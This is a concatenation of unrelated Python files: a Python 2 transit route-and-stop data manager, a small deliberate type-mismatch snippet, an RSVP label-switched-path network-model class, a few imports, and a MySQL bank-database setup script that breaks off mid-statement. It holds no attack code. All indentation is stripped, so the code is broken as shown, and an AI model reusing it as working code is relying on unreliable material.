raise ValueError("Duplicate stop_id: %s" % repr(stop_id))
self._stop_dict[stop_id] = stop
else:
print "Assign existing stop %d to route %d" % (stop_id, route_id)
stop = self.get_stop(stop_id)
# Assign this existing stop to the route
if stop.serves_route(route):
# It would be OK to "re-add" existing stop but this exception
# just helps to keep things clean
raise ValueError("Stop %d already serves route %d" % (stop_id, route_id))
else:
stop.manually_add_route(route_id)
route.manually_add_stop(stop_id)
print repr(stop)
def apply_stops_removed(self, removed_stops, route_id):
route = self._route_dict.get(route_id)
for removed_stop in removed_stops:
stop_id = removed_stop.get(KEY.STOP_ID)
stop = self._stop_dict.get(stop_id)
if stop is None:
raise ValueError("Bad stop!! stop_id: %s" % repr(stop_id))
stop.manually_remove_route(route_id)
route.manually_remove_stop(stop_id)
def apply_stop_updates(self, dataset):
stop_updates = STOP_UPDATES.get(dataset, [])
for item in stop_updates:
route_id = item.get(KEY.ROUTE_ID)
print "Considering route:", route_id
added_stops = item.get(KEY.STOPS_ADDED)
self.apply_stops_added(added_stops, route_id)
removed_stops = item.get(KEY.STOPS_REMOVED)
self.apply_stops_removed(removed_stops, route_id)
route_name = item.get(KEY.NAME)
if route_name is not None:
route = self.get_route(route_id)
route.set_name(route_name)
def add_new_stops(self, dataset):
new_stops = NEW_STOPS.get(dataset, {})
for stop_id, location in new_stops.iteritems():
print "Add stop: %d %s" % (stop_id, location)
lat = location.get(KEY.LAT)
lng = location.get(KEY.LNG)
if lat is None or lng is None:
raise ValueError("Bad Stop!")
name = "Manually Created Stop: %s" % repr(stop_id)
stop = TransitStop(stop_id, name, Point(lat, lng))
self._stop_dict[stop_id] = stop
def get_active_stops(self):
if not self._active_stops:
self.get_active_stop_ids()
return self._active_stops
def get_active_stop_ids(self):
if not self._active_stop_ids:
for stop_id, stop in self._stop_dict.iteritems():
if len(stop.get_route_ids()) > 0:
self._active_stop_ids.append(stop_id)
self._active_stops.append(stop)
return self._active_stop_ids
def get_segments(self, route_id):
route = self.get_route(route_id)
return route.get_segments()
# def get_stop(self, stop_id):
# return self._stop_dict.get(stop_id)
# def get_routes(self):
# return [route for route in self._route_dict.itervalues()]
def get_route_stops(self, route_id):
route = self.get_route(route_id)
stop_ids = route.get_stop_ids()
result = [self.get_stop(stop_id) for stop_id in stop_ids]
return result
# def get_stops(self):
# return [stop for stop in self._stop_dict.itervalues()]
# def get_route_ids(self):
# result = [k for k in self._route_dict.iterkeys()]
# return result
def read_directions(self):
sf = shapefile.Reader("%s/directions.dbf" % self._base_path)
records = sf.records()
shapes = sf.shapes()
# print "len(records)", len(records)
# print "len(shapes)", len(shapes)
for index, record in enumerate(records):
shape = shapes[index]
# print repr(record)
# continue
name = record[5].strip()
space_pos = name.find(' ')
route_number = int(name[:space_pos])
name = name[space_pos:]
d = record[2].strip().lower()
direction = self._dir_dict.get(d)
display_name = "%s (%s)" % (name.strip(), direction)
route_id = int(record[1])
if self._route_dict.has_key(route_id):
raise ValueError("Already have route key")
# points = [Point(p[1], p[0]) for p in shape.points]
segment = Polyline()
for p in shape.points:
segment.add_point(Point(p[1], p[0]))
route = TransitRoute(route_id, route_number, display_name)
route.add_segment(segment)
route.set_attribute(KEY.DIRECTION, direction)
# self._data[route_id] = {
# 'name' : display_name,
# "direction" : direction,
# "points" : points,
# "number" : number,
# }
self._route_dict[route_id] = route
def read_direction_stops(self):
"""
['1424e21', 'HDR Future Network V3', '4174', 'Superstore',
"10 Mainline, Confederation - Centre Mall (Inbound),
14 Crosstown, St Paul's (Outbound),
3 BRT, Green (Inbound),
48 Suburban Connector, 33rd St - Confed (Inbound)"]
"""
line_count = 0
# f = open("%s/test.out" % self._shape_base, 'rb')
file_name = "%s/direction_stops.dbf" % self._base_path
print "Reading file: %s..." % file_name
f = open(file_name, 'rb')
for line in f:
# print line
line_count += 1
if line_count > 2:
print "line", line
if line_count == 2:
parts = line.split()
part_count = len(parts)
print "Total part count: %d" % len(parts)
for i, part in enumerate(parts):
if i == 0 : continue
success = False
try:
float(part)
success = True
except:
if part.find("remix") >= 0:
success = True
elif part.find("Market") >= 0:
success = True
elif part.find("Mall") >= 0:
success = True
# print "%d part: '%s'" % (i, part)
# # if part.find("Market") >= 0:
# # raise ValueError("here: %d" % i)
# if part.find("Lawson") >= 0:
# raise ValueError("Lawson")
# if part.finf
# if i > 1010: break
if not success:
raise ValueError("Failed on part: %s" % part)
part_index = 1
while True:
if part_index >= part_count:
print "DONE"
break
route_id = int(parts[part_index].strip())
stop_id = parts[part_index + 1].strip()
if stop_id == "Market":
part_index += 1
stop_id = "Market Mall"
try:
stop_id = int(stop_id)
except:
print "Attempt to get stop_id from BAD_STOP_IDS", stop_id
stop_id = BAD_STOP_IDS_BRT.get(stop_id)
stop_id = int(stop_id)
stop = self._stop_dict.get(stop_id)
stop.add_route_id(route_id)
route = self._route_dict.get(route_id)
route.add_stop_id(stop_id)
dist = parts[part_index + 2].strip()
# print "dir_id", dir_id, "stop_id", stop_id, "dist", dist, self.get_route_name(dir_id)
part_index += 3
f.close()
# for stop_id, stop in self._stop_dict.iteritems():
# print "Stop: %d Routes: %d" % (stop_id, len(stop.get_route_ids()))
for route_id, route in self._route_dict.iteritems():
print "Route: %d Name: %s Stops: %d" % (route.get_number(), route.get_name(), len(route.get_stop_ids()))
print "Total number of routes", len(self._route_dict)
print "Done reading %s" % file_name
def read_stops(self):
file_name = "%s/stops.dbf" % self._base_path
print "Reading stops file: %s" % file_name
sf = shapefile.Reader(file_name)
records = sf.records()
shapes = sf.shapes()
made_up_id = 10000
print "len(records)", len(records)
print "len(shapes)", len(shapes)
for index, record in enumerate(records):
# print repr(record)
# continue
shape = shapes[index]
# print "len(shape.points)", len(shape.points)
# print shape.points
point = shape.points[0]
lat = point[1]
lng = point[0]
stop_id = record[2]
stop_name = record[3]
lines = record[4]
bad_id = None
try:
stop_id = int(stop_id)
except:
# print "'%s' : %d," % (record[2], made_up_id)
# made_up_id += 1
stop_id = BAD_STOP_IDS_BRT.get(record[2])
if stop_id is None:
print "FAILED TO GET STOP ID for", record[2]
continue
bad_id = record[2]
#print "Error: Failed to get stop ID for:", record[2]
# print stop_id, stop_name, lines
# lines = lines.strip()
# # print "LINES >>>%s<<<" % lines
#
# parts = lines.split(',')
# # print "LINE PARTS:", len(parts)
stop = TransitStop(stop_id, stop_name, Point(float(lat), float(lng)))
if bad_id is not None:
stop.set_attribute(KEY.BAD_ID, bad_id)
if self._stop_dict.has_key(stop_id):
raise ValueError("already have stop id: %s %d" % (repr(stop_id), index))
self._stop_dict[stop_id] = stop
for stop_id, stop in self._stop_dict.iteritems():
point = stop.get_point()
name = stop.get_name()
print "stop_id: %d name: %s lat:%f lng: %f" % (stop_id, name, point.get_lat(), point.get_lng())
print "Read %d stops" % len(self._stop_dict)
def get_stop_points(self, route_id):
result = []
data = self._route_dict.get(route_id)
stops = data.get("stops")
for stop_id in stops:
stop_data = self._stop_dict.get(stop_id)
if stop_data is None:
print "ERROR: no data for stop", repr(stop_id)
continue
point = stop_data.get('point')
result.append(point)
return result
def dataman_factory(dataset, link_route_shapes=False, link_stops=True):
base_path = DATASETS.get(dataset)
if base_path is None:
raise ValueError("dataset not supported: %s" % repr(dataset))
include_data_dict = OPEN_DATA_ROUTE_FILTER.get(dataset)
if include_data_dict is None:
thing = DatamanBrt(dataset)
else:
thing = DataManagerOpen(dataset, link_route_shapes=link_route_shapes, link_stops=link_stops)
return thing
class DataManagerOpen(DatamanBase):
"""
link_route_shapes : Get route shapes for plotting. Not required for heatmap.
Speeds things up a little bit if skipped (OpenData only)
link_stops : Link stops to routes. Required for heatmap but not for just
plotting the routes. Speeds things up if skipped (OpenData only)
"""
def __init__(self, dataset, link_route_shapes=False, link_stops=True):
super(DataManagerOpen, self).__init__(dataset)
self._include_route_dict = OPEN_DATA_ROUTE_FILTER.get(dataset)
self._deprecated = {}
self.read_file()
self.read_file_stops()
self._active_stops = []
self._trips = TransitTrips(self._base_path)
if link_route_shapes:
self._shapes = TransitShapes(self._base_path)
for route in self.get_routes():
shape_ids = self._trips.get_shape_ids(route.get_id())
for shape_id in shape_ids:
segment = self._shapes.get_polyline(shape_id)
route.add_segment(segment, segment_id=shape_id)
# Must cross-link routes/stops before calling stop times
# After dictionaries built, cross-link them
for route in self._route_dict.itervalues():
route.set_stop_dict(self._stop_dict)
for stop in self._stop_dict.itervalues():
stop.set_route_dict(self._route_dict)
if link_stops:
# This is SO ugly... must pass in reference to self
self._stop_times = StopTimes(self._base_path, self)
def _sanity_check_departures(self, stop_id, departures):
"""
Look for departures on same route/stop but with different directions
RESULT: There do not appear to be any cases where there is a departure
from a stop on the same route but with a different direction
"""
print "SANITY START"
d = {}
for depart in departures:
# print repr(depart)
direction = depart.get(KEY.DIRECTION)
route_id = depart.get(KEY.ROUTE_ID)
depart_time = depart.get(KEY.DEPART_TIME)
key = "%d-%d" % (route_id, depart_time)
# key = route_id
have_direction = d.get(key)
# print "HAVE", repr(have_direction), route_id
if have_direction is not None and have_direction != direction:
stop = self.get_stop(stop_id)
route = self.get_route(route_id)
print "WARN_DUPLICATE: %d (%s) %d (%s) " % (stop_id, stop.get_name(), route_id, route.get_name())
# raise ValueError("different direction stop_id: %d route_id: %d!!!" % \
# (stop_id, route_id))
# print "setting %d to %d" % (route_id, direction)
d[key] = direction
print "SANITY DONE"
def _get_time_minutes(self, time_str):
parts = time_str.split(":")
if len(parts) == 1:
# This is just an hour specification
result = 60 * int(parts[0])
elif len(parts) == 2:
result = 60 * int(parts[0]) + int(parts[1])
else:
raise ValueError("Invalid time string: %s" % repr(time_str))
# print "time: %s --> %d" % (time_str, result)
return result
def _dump_data(self, departures):
for depart in departures:
print repr(depart)
raise ValueError("ERROR")
def get_departures(self, stop, service):
return self._stop_times.get_stop_departures(stop, service)
# def get_departs_per_hour(self, route, direction, stop_id, service, time_str):
# departs_0 = self._get_departs_per_hour_internal(route, stop_id, service, time_str, 0)
# departs_1 = self._get_departs_per_hour_internal(route, stop_id, service, time_str, 1)
#
# return departs_0 + departs_1
def get_departs_per_hour(self, route, direction, stop, service, time_str):
"""
Must consider each direction seperately
"""
# Get target depart time
target_sec = 60.0 * self._get_time_minutes(time_str)
# Get all departures from this stop (they are sorted)
departures = self._stop_times.get_stop_departures(stop, service, direction=direction, route=route)
#self._sanity_check_departures(stop_id, departures)
start_sec = target_sec - 30 * 60
end_sec = target_sec + 30 * 60
depart_count = 0
for depart in departures:
depart_sec = depart.get(KEY.DEPART_TIME)
if depart_sec >= start_sec and depart_sec < end_sec:
depart_count += 1
# print "Start: %s target: %s stop: %s DEPARTS: %s" % \
# ( seconds_to_depart_time(start_sec),
# seconds_to_depart_time(target_sec),
# seconds_to_depart_time(end_sec),
# seconds_to_depart_time(depart_sec))
return depart_count
def get_departs_per_day(self, route, direction, stop, service):
# Get all departures from this stop (they are sorted)
departures = self._stop_times.get_stop_departures(stop, service, direction=direction, route=route)
return len(departures)
def get_departs_per_week(self, route, direction, stop):
result = self.get_departs_per_day(route, 0, stop, SERVICE.MWF)
result += self.get_departs_per_day(route, 1, stop, SERVICE.MWF)
result += self.get_departs_per_day(route, 0, stop, SERVICE.SAT)
result += self.get_departs_per_day(route, 1, stop, SERVICE.SAT)
result += self.get_departs_per_day(route, 0, stop, SERVICE.SUN)
result += self.get_departs_per_day(route, 1, stop, SERVICE.SUN)
return result
# def _get_departs_per_hour_internal_OLD(self, route, stop_id, service, time_str, direction):
# """
# Attempting to get departures per hour based on interval between two departures
# is not working well. There are just too many screwey scenarios. For example there
# are stops with departures on the same route/direction that leave a minute apart
# and then fork to different destination. It might be simpler to just cound departures
# over a one hour interval
# """
#
# if isinstance(route, TransitRoute):
# route_id = route.get_id()
# else:
# route_id = route
#
# # Get target depart time
# target_sec = 60.0 * self._get_time_minutes(time_str)
#
# # Get all departures from this stop (they are sorted)
# departures = self._stop_times.get_stop_departures(stop_id, service, direction=direction, route_id=route_id)
#
# #self._sanity_check_departures(stop_id, departures)
#
# # Make a list with depart time as first item in tuple
# d = []
# for depart in departures:
# depart_sec = depart.get(KEY.DEPART_TIME)
# d.append((depart_sec, depart))
#
# first_after = None
# second_after = None
# first_before = None
# second_before = None
# seconds = None
#
# # Look for first occurance of time that is greater depart time while
# # keeping track of departures before and after
# for i, item in enumerate(d):
#
# second_before = first_before
# first_before = seconds
#
# seconds = item[0]
#
# if seconds < target_sec:
# try:
# x = d[i+1]
# first_after = x[0]
# except:
# first_after = None
#
# try:
# x = d[i+2]
# second_after = x[0]
# except:
# second_after = None
# else:
# break
#
#
# print "BEFORE: %s %s TIME: %s AFTER: %s %s" % \
# (repr(second_before), repr(first_before), repr(target_sec), repr(first_after), repr(second_after))
#
# interval = None
#
# if first_after is not None and first_before is not None:
# interval = first_after - first_before
#
# if first_after <= target_sec:
# self._dump_data(departures)
#
# if interval <= 0:
# self._dump_data(departures)
#
# elif first_before is not None:
# # Target time must be after last departure
# pass # No hourly departures for this scenarion.... its too late in the day
# # if second_before is not None:
# # interval = first_before - second_before
# # interval2 = target_sec - first_before
# # if interval2 > interval:
# # interval = None
#
# elif first_after is not None:
# # There are some departures after the target time (e.g, first thing in morning
# if second_after is not None:
# interval = second_after - first_after
# interval2 = first_after - target_sec
# # Only return hourly departures if the first departure is not too far away
# if interval2 > interval:
# interval = None
#
# # depart_hour = depart_min / 60
# # leftover_min = depart_min - depart_hour * 60
# # print "depart time %d:%02d" % (depart_hour, leftover_min)
# departs_per_hour = 0
#
# if interval is not None:
# minutes = interval / 60
#
# if minutes == 0:
# for depart in departures:
# print repr(depart)
#
# departs_per_hour = 60 / minutes
#
# # Sanity tests
# if departs_per_hour > 10:
# print "GOT %d departures (stop ID): %s" % (departs_per_hour, stop_id)
# self._dump_data(departures)
#
# return departs_per_hour
def get_active_stops(self):
if not self._active_stops:
stops = self.get_stops()
for stop in stops:
routes_ids = stop.get_route_ids()
# print stop.get_name(), routes_ids
if len(routes_ids) > 0:
self._active_stops.append(stop)
# print "Total stops:", len(self._stop_dict)
# print "Active stops:", len(self._active_stops)
return self._active_stops
def get_route_from_trip_id(self, trip_id):
route_id = self._trips.get_route_id(trip_id)
return self.get_route(route_id)
def get_trip_service_type(self, trip_id):
return self._trips.get_service_type(trip_id)
def get_trip_headsign(self, trip_id):
return self._trips.get_headsign(trip_id)
def get_trip_direction(self, trip_id):
return self._trips.get_direction(trip_id)
def read_file_stops(self):
"""
0 stop_id,
1 stop_code,
2 stop_lat,
3 stop_lon,
4 location_type,
5 wheelchair_boarding,
6 name
"""
file_name = os.path.join(self._base_path, "my-TransitStops.csv")
result = {}
line_count = 0
f = None
fake_stop_id = 10000
print "Reading file %s..." % file_name
try:
f = open(file_name, 'r')
for line in f:
line_count += 1
if line_count == 1: continue
line = line.strip()
parts = line.split(",")
bad_id = None
try:
item = parts[0].strip()
pos = item.find("_merged")
if pos > 0:
fixed = item[:pos]
print "Fixed :%s -> %s" % (item, fixed)
item = fixed
stop_id = int(item)
except Exception as err:
print "Exception processing line: %s" % repr(err), item
print "Line: %s" % line
stop_id = fake_stop_id
print "Assign fake stop ID: %d" % fake_stop_id
fake_stop_id += 1
bad_id = item
name = parts[6].strip()
lat = float(parts[2].strip())
lng = float(parts[3].strip())
stop = TransitStop(stop_id, name, Point(lat, lng))
if bad_id:
stop.set_attribute(KEY.BAD_ID, bad_id)
result[stop_id] = stop
finally:
if f: f.close()
self._stop_dict = result
print "Read %d stops" % len(self._stop_dict)
def read_file(self):
"""
0 route_id,
1 route_type,
2 route_color,
3 text_color,
4 name_short,
5 name_long
"""
file_name = os.path.join(self._base_path, "my-TransitRoutes.csv")
line_count = 0
f = None
try:
f = open(file_name, 'r')
for line in f:
line_count += 1
if line_count == 1: continue
line = line.strip()
parts = line.split(",")
route_id = int(parts[0].strip())
route_number = int(parts[4].strip())
long_name = parts[5].strip()
# I am not sure what the route type is
route_type = int(parts[1].strip())
if route_type != 3:
raise ValueError("route type not 3")
print "read route ID", route_id
if not self._include_route_dict.has_key(route_id):
print "SKIPPING ROUTE", route_id
self._deprecated[route_id] = (route_number, long_name)
continue
if self._route_dict.has_key(route_id):
raise ValueError("THIS IS A DUP!!!")
route = TransitRoute(route_id, route_number, long_name)
# self._data[route_id] = (short_name, long_name)
self._route_dict[route_id] = route
print "number of routes:", len(self._route_dict)
finally:
if f:
f.close()
# ----- TEST -----
s = []
for route_id, route in self._route_dict.iteritems():
name = route.get_name()
s.append((name, route_id))
s = sorted(s)
for i, item in enumerate(s):
print "%d ID: %s NAME: %s" % (i+1, item[1], item[0])
# ---- END TEST -----
# def get_stop_points(self, route_id):
# if self._shapefile_mode:
# return self._shapefile.get_stop_points(route_id)
# raise ValueError("fixme")
# def get_stops(self, route_id):
# if self._shapefile_mode:
# return self._shapefile.get_stops(route_id)
# raise ValueError("fixme")
def get_segments(self, route_id):
"""
Unfortunately the pre-BRT data routes are described in not one but several polylines.
These MUST be plotted independently otherwise we get lots of spurious lines on the plot
:param route_id:
:return:
"""
# Allocate on demand
if self._transit_trips is None:
self._transit_trips = TransitTrips(self._base_path)
# Allocate on demand
if self._transit_shapes is None:
self._transit_shapes = TransitShapes(self._base_path)
result = []
shape_ids = self._transit_trips.get_shape_ids(route_id)
for shape_id in shape_ids:
polyline = self._transit_shapes.get_polyline(shape_id)
result.append(polyline)
return result
def get_route_ids(self):
result = [k for k in self._route_dict.iterkeys()]
return result
def get_routes(self):
return [route for route in self._route_dict.itervalues()]
|
def f(x: int):
return x
def g(y: str):
return y
x = f(4)
g(x)
|
"""A class to represent an RSVP label-switched-path in the network model """
import random
from .exceptions import ModelException
class RSVP_LSP(object):
"""A class to represent an RSVP label-switched-path in the network model
source_node_object: Node where LSP ingresses the network (LSP starts here)
dest_node_object: Node where LSP egresses the network (LSP ends here)
lsp_name: name of LSP
path: will either be 'Unrouted' or be a dict containing the following -
- interfaces: list of interfaces that LSP egresses in the order it
egresses them
- path_cost: sum of costs of the interfaces
- baseline_path_reservable_bw: the amount of reservable bandwidth
available on the LSP's path when the LSP was signaled, not inclusive
of the bandwidth already reserved by this LSP on that path (if any)
reserved_bandwidth: amount of bandwidth reserved by this LSP
setup_bandwidth: amount of bandwidth this LSP wants to signal for
"""
def __init__(self, source_node_object, dest_node_object,
lsp_name='none', configured_setup_bandwidth=None):
self.source_node_object = source_node_object
self.dest_node_object = dest_node_object
self.lsp_name = lsp_name
self.path = 'Unrouted - initial'
self.reserved_bandwidth = 'Unrouted - initial'
self._setup_bandwidth = 'Unrouted - initial'
self.configured_setup_bandwidth = configured_setup_bandwidth
@property
def _key(self):
"""Unique identifier for the rsvp lsp: (Node('source').name, Node('dest').name, name)"""
return (self.source_node_object.name, self.dest_node_object.name, self.lsp_name)
def __repr__(self):
return 'RSVP_LSP(source = %s, dest = %s, lsp_name = %r)' % \
(self.source_node_object.name,
self.dest_node_object.name,
self.lsp_name)
def _find_path_cost_and_headroom_routed_lsp(self, candidate_paths):
"""
Returns a list of dictionaries containing the path interfaces as
well as the path cost and headroom available on the path. This def
takes into account that self is a routed LSP and is looking to
signal for additional bandwidth. As such, this def adds back its
existing reserved_bandwidth to any Interface in a path in
candidate_paths that it is already signaled on.
:param candidate_paths: list of lists of Interface objects
:return: list of dictionaries of paths: {'interfaces': path,
'path_cost': path_cost,
'baseline_path_reservable_bw': baseline_path_reservable_bw}
"""
# List to hold info on each candidate path
candidate_path_info = []
# Find the path cost and path headroom for each path candidate
for path in candidate_paths['path']:
path_cost = 0
for interface in path:
path_cost += interface.cost
# Find the path cost and reservable bandwidth on each path.
# If the path you are examining has an interface that is on
# the LSP's current path, add back in the
# reserved bandwidth for the LSP to that interface
proto_reservable_bw = {}
for interface in path:
if interface in self.path['interfaces']:
proto_reservable_bw[interface] = interface.reservable_bandwidth + self.reserved_bandwidth
else:
proto_reservable_bw[interface] = interface.reservable_bandwidth
# baseline_path_reservable_bw is the max amount of traffic
# that the path can handle without using more than a component
# interface's reservable_bandwidth
baseline_path_reservable_bw = min(proto_reservable_bw.values())
path_info = {'interfaces': path, 'path_cost': path_cost,
'baseline_path_reservable_bw': baseline_path_reservable_bw}
candidate_path_info.append(path_info)
return candidate_path_info
@property
def setup_bandwidth(self):
"""
The bandwidth the LSP attempts to signal for.
:return: the bandwidth the LSP attempts to signal for
"""
return self._setup_bandwidth
@setup_bandwidth.setter
def setup_bandwidth(self, proposed_setup_bw):
"""
Puts guardrails on the setup bandwidth for the RSVP LSP
:param proposed_setup_bw: setup bandwidth value to be evaluated
:return:
"""
# Check for configured_setup_bandwidth
if self.configured_setup_bandwidth:
self._setup_bandwidth = float(self.configured_setup_bandwidth)
elif proposed_setup_bw >= 0:
self._setup_bandwidth = float(proposed_setup_bw)
elif proposed_setup_bw < 0:
msg = "setup_bandwidth must be 0 or greater"
raise ModelException(msg)
def find_rsvp_path_w_bw(self, requested_bandwidth, model):
"""
Will search the topology of 'model' for a path for self that has at least
'requested_bandwidth' of reservable_bandwidth. If there is one, will update
self.path; if not, will keep same self.path. When checking paths,
this def will take into account its own reserved bandwidth if it
is looking at paths that have interfaces already in its
path['interfaces'] list.
:param model: Model object to search; this will typically be a Model
object consisting of only non-failed interfaces
:param requested_bandwidth: number of units set for reserved_bandwidth
:return: self with the current or updated path info
"""
# Get candidate paths; only include interfaces that have requested_bandwidth
# of reservable_bandwidth
candidate_paths = model.get_shortest_path_for_routed_lsp(self.source_node_object.name,
self.dest_node_object.name,
self, requested_bandwidth)
# Find the path cost and path headroom for each path candidate
candidate_path_info = self._find_path_cost_and_headroom_routed_lsp(candidate_paths)
# If there are no paths with enough headroom, return self
if len(candidate_path_info) == 0:
return self
# If there is only one path with enough headroom, make that self.path
elif len(candidate_path_info) == 1:
self.path = candidate_path_info[0]
# If there is more than one path with enough headroom,
# choose one at random and make that self.path
elif len(candidate_path_info) > 1:
self.path = random.choice(candidate_path_info)
self.reserved_bandwidth = requested_bandwidth
self.setup_bandwidth = requested_bandwidth
return self
def _add_rsvp_lsp_path(self, model):
"""
Determines the LSP's path regardless of whether it was previously routed
or not (non stateful).
If this LSP is currently routed and takes takes on additional traffic
and there is not a path that can handle the additional traffic,
this LSP will not signal.
:param model: Model object that the LSP is in
:return: self with 'path' attribute
"""
# Try all shortest paths with needed reservable bandwidth
candidate_paths = model.get_shortest_path(self.source_node_object.name,
self.dest_node_object.name, self.setup_bandwidth)
# Route LSP
# Options:
# a. There are no viable paths on the topology to route LSP - LSP will be unrouted
# b. LSP can route with current setup_bandwidth
# Option a. There are no viable paths on the topology to route LSP - LSP will be unrouted
if candidate_paths['path'] == []:
# If there are no possible paths, then LSP is Unrouted
self.path = 'Unrouted'
self.reserved_bandwidth = 'Unrouted'
return self
self.path = {}
# Find the path cost and path headroom for each path candidate
candidate_path_info = self._find_path_cost_and_headroom(candidate_paths)
# Option b. LSP can route with current setup_bandwidth
# If multiple lowest_metric_paths, find those with fewest hops
if len(candidate_path_info) > 1:
fewest_hops = min([len(path['interfaces']) for path in candidate_path_info])
lowest_hop_count_paths = [path for path in candidate_path_info if len(path['interfaces']) == fewest_hops]
if len(lowest_hop_count_paths) > 1:
new_path = random.choice(lowest_hop_count_paths)
else:
new_path = lowest_hop_count_paths[0]
else:
new_path = candidate_path_info[0]
self.path = new_path
# Since there is enough headroom, set LSP
# reserved_bandwidth to setup_bandwidth
self.reserved_bandwidth = self.setup_bandwidth
# Update the reserved_bandwidth on each interface on the new path
for interface in self.path['interfaces']:
# Make LSP reserved_bandwidth = setup_bandwidth because it is able to
# signal for the entire amount
interface.reserved_bandwidth += self.reserved_bandwidth
return self
def _find_path_cost_and_headroom(self, candidate_paths):
"""
Returns a list of dictionaries containing the path interfaces as
well as the path cost and headroom available on the path.
:param candidate_paths: list of lists of Interface objects
:return: list of dictionaries of paths: {'interfaces': path,
'path_cost': path_cost,
'baseline_path_reservable_bw': baseline_path_reservable_bw}
"""
# List to hold info on each candidate path
candidate_path_info = []
# Find the path cost and path headroom for each path candidate
for path in candidate_paths['path']:
path_cost = 0
for interface in path:
path_cost += interface.cost
# baseline_path_reservable_bw is the max amount of traffic that the path
# can handle without saturating a component interface
baseline_path_reservable_bw = min([interface.reservable_bandwidth for interface in path])
path_info = {'interfaces': path, 'path_cost': path_cost,
'baseline_path_reservable_bw': baseline_path_reservable_bw}
candidate_path_info.append(path_info)
return candidate_path_info
def demands_on_lsp(self, model):
"""Returns demands that LSP is transporting."""
demand_list = []
for demand in (demand for demand in model.demand_objects):
if self in demand.path:
demand_list.append(demand)
return demand_list
def traffic_on_lsp(self, model):
"""
Returns the amount of traffic on the LSP
:param model: Model object for LSP
:return: Units of traffic on the LSP
"""
# Find all LSPs with same source and dest as self
parallel_lsp_groups = model.parallel_lsp_groups()
total_traffic = sum([demand.traffic for demand in self.demands_on_lsp(model)])
key = "{}-{}".format(self.source_node_object.name, self.dest_node_object.name)
parallel_routed_lsps = [lsp for lsp in parallel_lsp_groups[key] if 'Unrouted' not in lsp.path]
traffic_on_lsp = total_traffic / len(parallel_routed_lsps)
return traffic_on_lsp
def effective_metric(self, model):
"""Returns the metric for the best path. This value will be the
shortest possible path from LSP's source to dest, regardless of
whether the LSP takes that shortest path or not."""
return model.get_shortest_path(self.source_node_object.name,
self.dest_node_object.name, needed_bw=0)['cost']
def actual_metric(self, model):
"""Returns the metric sum of the interfaces that the LSP actually
transits."""
if 'Unrouted' in self.path:
metric = 'Unrouted'
else:
metric = sum([interface.cost for interface in self.path['interfaces']])
return metric
def route_lsp(self, model, setup_bandwidth):
"""
Used in Model object to route each LSP
:param model:
:return:
"""
# Calculate setup bandwidth
self.setup_bandwidth = setup_bandwidth
# Route the LSP
self._add_rsvp_lsp_path(model)
return self
|
from pegasos import *
from sgdqn import *
from asgd import *
from olbfgs import * |
# *** Bank Database Management System ***
# A simple terminal application coded in python is used as frontend.
# Oracle’s MySQL is used as the backend database system
# Import pymysql package to provide a simple interface to MySQL Database.
import pymysql
# Take the credentials to MySQL as user input
username = input("Input the username for the MySQL database: ")
password = input("Input the password for the MySQL database: ")
try:
connection = pymysql.connect(host='localhost',
user=username,
password=password,
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
print("Connection Successful!!!")
except pymysql.err.OperationalError as e:
print('Error: %d: %s' % (e.args[0], e.args[1]))
# Create the database called Bank Database System
cursor = connection.cursor()
query = 'CREATE DATABASE IF NOT EXISTS `BankDatabaseSystem`'
cursor.execute(query)
print("Database created successfully")
# Connect to the created Database
database = pymysql.connect(host='localhost',
user=username,
password=password,
charset='utf8mb4',
db='BankDatabaseSystem',
cursorclass=pymysql.cursors.DictCursor)
try:
cursor = database.cursor()
# Create table Bank Branch
cursor.execute(
"""CREATE TABLE IF NOT EXISTS `Branch`
(
`id` INT PRIMARY KEY AUTO_INCREMENT,
`name` VARCHAR(50) NOT NULL,
`phone` VARCHAR(20) NOT NULL,
`city` VARCHAR(50) NOT NULL,
`state` CHAR(2) NOT NULL,
`zip` VARCHAR(20) NOT NULL
)""")
# Create table Customer
cursor.execute(
"""CREATE TABLE IF NOT EXISTS `Customer`
(
`id` INT PRIMARY KEY AUTO_INCREMENT,
`first_name` VARCHAR(50) NOT NULL,
`last_name` VARCHAR(50) NOT NULL,
`phone` VARCHAR(20) NOT NULL,
`city` VARCHAR(50) NOT NULL,
`state` CHAR(2) NOT NULL,
`zip` VARCHAR(20) NOT NULL
)""")
# Create table Account
cursor.execute(
"""CREATE TABLE IF NOT EXISTS `Account`
(
`id` INT PRIMARY KEY AUTO_INCREMENT,
`acc_number` VARCHAR(20) NOT NULL,
`acc_type` VARCHAR(20) NOT NULL,
`balance` DOUBLE DEFAULT 0.0,
`branch_id` INT NOT NULL,
`owner_id` INT NOT NULL,
FOREIGN KEY(`owner_id`) REFERENCES `customer`(`id`) ON UPDATE CASCADE ON DELETE CASCADE,
FOREIGN KEY(`branch_id`) REFERENCES `Branch`(`id`) ON UPDATE CASCADE ON DELETE CASCADE
)""")
# Create Table Loan
cursor.execute(
"""CREATE TABLE IF NOT EXISTS `Loan`
(
`id` INT PRIMARY KEY AUTO_INCREMENT,
`customer_id` INT NOT NULL,
`account_id` INT NOT NULL,
`amount` INT DEFAULT 0,
`interest` DOUBLE NOT NULL DEFAULT 0.0,
`years` INT NOT NULL DEFAULT 2,
FOREIGN KEY(`customer_id`) REFERENCES `Customer`(`id`) ON UPDATE CASCADE ON DELETE CASCADE,
FOREIGN KEY(`account_id`) REFERENCES `Account`(`id`) ON UPDATE CASCADE ON DELETE CASCADE
)""")
# Create Table Transaction
cursor.execute(
"""CREATE TABLE IF NOT EXISTS `Transaction`
(
`id` INT PRIMARY KEY AUTO_INCREMENT,
`customer_id` INT NOT NULL,
`account_id` INT NOT NULL,
`amount` INT DEFAULT 0,
`description` VARCHAR(255) NOT NULL DEFAULT "",
FOREIGN KEY(`customer_id`) REFERENCES `Customer`(`id`) ON UPDATE CASCADE ON DELETE CASCADE,
FOREIGN KEY(`account_id`) REFERENCES `Account`(`id`) ON UPDATE CASCADE ON DELETE CASCADE
)""")
# Create Table Claim
cursor.execute(
"""CREATE TABLE IF NOT EXISTS `Claim`
(
`id` INT PRIMARY KEY AUTO_INCREMENT,
`account_id` INT NOT NULL,
`owner_id` INT NOT NULL,
`description` VARCHAR(255) NOT NULL DEFAULT "",
`date` DATETIME NOT NULL,
FOREIGN KEY(`account_id`) REFERENCES `Account`(`id`) ON UPDATE CASCADE ON DELETE CASCADE,
FOREIGN KEY(`owner_id`) REFERENCES `Customer`(`id`) ON UPDATE CASCADE ON DELETE CASCADE
)""")
print("All tables are created successfully in the Bank Database System")
# Now, we need to insert some sample data for demonstration purposes
cursor.execute(
